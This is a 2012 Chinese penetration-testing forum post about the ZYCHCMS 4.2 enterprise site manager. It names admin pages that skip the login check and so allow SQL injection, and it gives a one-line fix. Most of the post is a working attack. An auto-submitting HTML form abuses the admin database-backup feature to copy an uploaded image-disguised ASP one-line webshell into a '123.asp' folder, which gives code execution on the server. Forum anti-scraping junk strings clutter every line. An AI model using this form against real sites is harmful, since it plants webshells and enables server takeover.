中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

- H) E1 p6 l0 e4 e
- h  M; i  S8 R9 ^% w' f
3 o/ c! z7 j* M; A8 {0 {
" |2 r1 e/ {4 @, r$ ~7 U0 ^8 g影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
' }3 N! X! R1 @$ v2 ~/ t ①SQL注射漏洞
1 |! |# R' n8 L0 \, h- k7 e3 M 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp' C: }8 Y& j, ^
漏洞原因:未过滤
/ S1 w- {2 N! D6 J7 y 漏洞代码:
/ g4 P3 K7 `* ]% U 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
4 E: }7 A& N+ k& T  | 修复方法:在文件开头加入代码' r3 Y1 ^" k6 ^2 k0 ?
- R" W6 N, @' g! R9 X/ p" }2 K

4 r, O9 r& @/ ~) ?/ `+ B1 m# P②后台拿WBSHELL
* n, N' ~; j- t 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
9 X' G/ I; W: \% ~ 这里在网上找了一个,改了下,将就着用。) x! g" [, d5 y/ H$ V+ g8 t$ A
以下是代码本地提交代码/ n. b4 K$ r& x" e: A0 @

2 U: A. x0 q1 \0 p* ]) p
" C* J2 |- w# R- W8 [7 R<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
$ [% h0 d3 C6 I; c <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>/ S* G5 _; m* `' U- h- I' E% [
<tr>- g5 H6 q$ r( I5 H3 P( A
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>/ J/ S! ]7 E% [" Z+ a: K+ E
</tr>- t1 I1 o6 J  [& F2 d
<tr>; ^& T! ~& A7 d2 t
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
. A5 H& ]: I6 C- @) B </span>; Y9 L5 I  X3 D
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
$ J' c& n: |+ v8 H2 c <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
' _* {  V" K- x" T! y; J8 H <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>; n& F  Q( B9 q$ d+ f- A( f1 b( Z
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
( [6 f) U" ~+ w4 m <div align=”left”>
# J% l. J% h3 P1 u0 @$ Y( [/ l0 F <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
( Q" r; \0 Q! R/ r% c <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>( {' J9 K/ x' }- Y
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />! |. q; ]8 V" e# u! g
</div></td>  l- h  }9 k4 p" x) t
</tr>& q5 s- M2 C* n1 N9 _
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
. f/ d& @- K/ W2 ?' J% d4 M6 f <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>3 y. E! \# k4 ^+ a. V+ D
<td class=”td”><div align=”left”>
0 f$ ^' O0 R; ^. Y! v3 p+ z <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
0 v0 ^8 Y; l0 t" [ [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
, r: a) p8 y% b' ^9 C, v </tr>
; V1 V5 ?) _3 p# @- D; Y3 o# ^ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>( x, U1 Z1 v: j: z! T) G& A
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
' B1 f# Y5 g0 S1 F! J( @ <td class=”td”><div align=”left”>
$ T. c3 N( I3 n% ^# T5 ]) Q& l <input type=”submit” value=”确定备份” class=”btn”; H% ~/ Q8 A; C- c2 c
</div></td>1 L5 q, S& |* N9 l
</tr># |2 _/ y/ n/ ?& \
</table></td></tr></form>$ p  ~9 ^  a, b% B
</table>
( x% [& ]+ e/ N$ P* |4 |" w </td>; E% ?, X6 N( T, n8 V; X6 R
</tr>+ ~& i" @* \/ X) D$ h
</table>
# l$ Q% d+ v2 t: Q& E% C <script>% q& a9 {& W9 d; g2 u/ w- l
document.all.add.submit();
0 J8 Q4 M  K4 m+ U' L- j. ?$ r7 s </script>
4 v, L6 [( G8 g4 m# J# [: ]
; b% g, g" N# |: c2 t6 m* A  d' V
( n9 W, @$ i3 a) i6 X
5 s, F6 h) L7 a* i7 P

/ L* g, ]: Q1 W: Q0 n+ B( Y, j2 I  k7 J, i  @9 L# @

, z# C9 w5 Z" T* V3 |: b+ y/ x- k$ B) {4 x% k  }

$ W; j" _0 j& x7 Z, k/ N
' N( r# U* U' b9 j4 `4 j+ b# S




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2